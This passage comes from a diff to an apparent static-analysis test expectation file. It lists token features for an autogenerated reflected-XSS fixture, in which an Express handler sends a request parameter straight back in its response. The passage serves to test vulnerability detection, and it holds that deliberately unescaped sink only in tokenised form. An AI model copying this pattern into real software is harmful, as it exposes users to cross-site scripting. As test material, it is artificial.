res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:37 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:37 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:37 | exceptional return of res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:37 | res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:37 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:37 | res.sen ... ams.id) | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:37 | res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:5:63:37 | res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:9:63:12 | send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:9:63:12 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:9:63:12 | send | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:9:63:12 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:9:63:12 | send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:14:63:20 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:14:63:20 | "FOO: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:14:63:20 | "FOO: " | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:14:63:20 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:14:63:20 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:14:63:20 | "FOO: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:14:63:36 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:14:63:36 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:14:63:36 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20634,6 +137054,112 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:14:63:36 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:14:63:36 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:14:63:36 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:26 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:26 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:26 | req | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:26 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:26 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:33 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:33 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:33 | req.params | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:33 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:33 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:36 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:36 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:36 | req.params.id | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:36 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:36 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:24:63:36 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:28:63:33 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:28:63:33 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:28:63:33 | params | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:28:63:33 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:28:63:33 | params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:35:63:36 | id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:35:63:36 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:35:63:36 | id | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:35:63:36 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:63:35:63:36 | id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:13 | doSomething | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:13 | doSomething | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:13 | doSomething | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:13 | doSomething | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:13 | doSomething | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:15 | doSomething() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:15 | doSomething() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:15 | doSomething() | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:15 | doSomething() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:15 | doSomething() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:15 | exceptional return of doSomething() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:15 | exceptional return of doSomething() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:15 | exceptional return of doSomething() | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:15 | exceptional return of doSomething() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:66:3:66:15 | exceptional return of doSomething() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:15 | somethingMore | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:15 | somethingMore | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:15 | somethingMore | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:15 | somethingMore | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:15 | somethingMore | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:17 | exceptional return of somethingMore() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:17 | exceptional return of somethingMore() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:17 | exceptional return of somethingMore() | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:17 | exceptional return of somethingMore() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:17 | exceptional return of somethingMore() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:17 | somethingMore() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:17 | somethingMore() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:17 | somethingMore() | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:17 | somethingMore() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:67:3:67:17 | somethingMore() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:12 | Math | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:12 | Math | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:12 | Math | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:12 | Math | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:12 | Math | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:19 | Math.random | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:19 | Math.random | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:19 | Math.random | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:19 | Math.random | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:19 | Math.random | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:21 | Math.random() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:21 | Math.random() | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:21 | Math.random() | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:21 | Math.random() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:21 | Math.random() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:21 | exceptional return of Math.random() | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:21 | exceptional return of Math.random() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:21 | exceptional return of Math.random() | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:21 | exceptional return of Math.random() | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:9:68:21 | exceptional return of Math.random() | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:14:68:19 | random | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:14:68:19 | random | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:14:68:19 | random | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:14:68:19 | random | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:68:14:68:19 | random | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:5 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:5 | res | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:5 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:15 | res.writeHead | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:15 | res.writeHead | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:15 | res.writeHead | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:15 | res.writeHead | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:15 | res.writeHead | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:20 | exceptional return of res.writeHead(404) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:20 | exceptional return of res.writeHead(404) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:20 | exceptional return of res.writeHead(404) | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:20 | exceptional return of res.writeHead(404) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:20 | exceptional return of res.writeHead(404) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:20 | res.writeHead(404) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:20 | res.writeHead(404) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:20 | res.writeHead(404) | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:20 | res.writeHead(404) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:3:69:20 | res.writeHead(404) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:7:69:15 | writeHead | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:7:69:15 | writeHead | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:7:69:15 | writeHead | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:7:69:15 | writeHead | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:7:69:15 | writeHead | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:17:69:19 | 404 | CalleeFlexibleAccessPath | res.writeHead | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:17:69:19 | 404 | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:17:69:19 | 404 | contextFunctionInterfaces | textContentType() | @@ -20642,6 +137168,37 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:17:69:19 | 404 | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:17:69:19 | 404 | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:69:17:69:19 | 404 | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:5 | res | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:5 | res | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:5 | res | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:10 | res.send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:10 | res.send | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:10 | res.send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:35 | exceptional return of res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:35 | exceptional return of res.sen ... ams.id) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:35 | exceptional return of res.sen ... ams.id) | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:35 | exceptional return of res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:35 | exceptional return of res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:35 | res.sen ... ams.id) | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:35 | res.sen ... ams.id) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:35 | res.sen ... ams.id) | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:35 | res.sen ... ams.id) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:3:70:35 | res.sen ... ams.id) | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:7:70:10 | send | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:7:70:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:7:70:10 | send | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:7:70:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:7:70:10 | send | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:12:70:18 | "FOO: " | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:12:70:18 | "FOO: " | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:12:70:18 | "FOO: " | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:12:70:18 | "FOO: " | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:12:70:18 | "FOO: " | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:12:70:18 | "FOO: " | stringConcatenatedWith | -endpoint- req.params.id | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:12:70:34 | "FOO: " ... rams.id | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:12:70:34 | "FOO: " ... rams.id | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:12:70:34 | "FOO: " ... rams.id | contextFunctionInterfaces | textContentType() | @@ -20650,6 +137207,47 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:12:70:34 | "FOO: " ... rams.id | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:12:70:34 | "FOO: " ... rams.id | fileImports | express | | autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:12:70:34 | "FOO: " ... rams.id | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:24 | req | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:24 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:24 | req | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:24 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:24 | req | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:31 | req.params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:31 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:31 | req.params | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:31 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:31 | req.params | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:34 | req.params.id | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:34 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:34 | req.params.id | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:34 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:34 | req.params.id | fileImports | express | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:22:70:34 | req.params.id | stringConcatenatedWith | 'FOO: ' -endpoint- | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:26:70:31 | params | contextFunctionInterfaces | textContentType() | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:26:70:31 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:26:70:31 | params | enclosingFunctionBody | req res err res writeHead 200 Content-Type application/json res send FOO: req params id doSomething somethingMore Math random res writeHead 404 res send FOO: req params id | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:26:70:31 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXssContentTypes.js:70:26:70:31 | params 